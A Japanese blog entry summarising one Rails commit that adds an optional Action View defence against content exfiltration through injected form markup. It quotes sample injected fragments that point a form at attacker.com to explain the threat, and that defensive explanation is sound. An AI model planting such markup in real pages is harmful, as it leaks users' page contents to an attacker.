なるようになるブログ

読書感想文かrailsについてかrubyについてか

rails commit log流し読み(2022/08/15)

2022/08/15分のコミットです。

CHANGELOGへの追加はありませんでした。

Merge pull request #44472 from camertron/content_injection_prevention

Action Viewの修正です。

formタグに対して、XSS対策用の特殊なコンテントの追加が出来るよう修正しています。この機能はconfig.action_view.prepend_content_exfiltration_preventionにtrueを指定した場合に実行されるようになっています。この機能を有効化すると、formタグの前に下記のようなタグが追加されます。

<!-- '"` --><!-- </textarea></xmp> --></option></form>

これは、<form action="https://attacker.com"><textarea>、や<form action="https://attacker.com"><option>などのHTMLがなんらかの理由でinjectされてしまった場合に、それらの攻撃を防げるようにする為に追加しているとのことです。

なお、このコンテントを追加した事で、HTMLの構成としては不正な構成になりますが、これはGitHubですでにやっている対策で、GitHubではこれによりブラウザに不正なHTMLとみなされ問題になった事はない、との事です。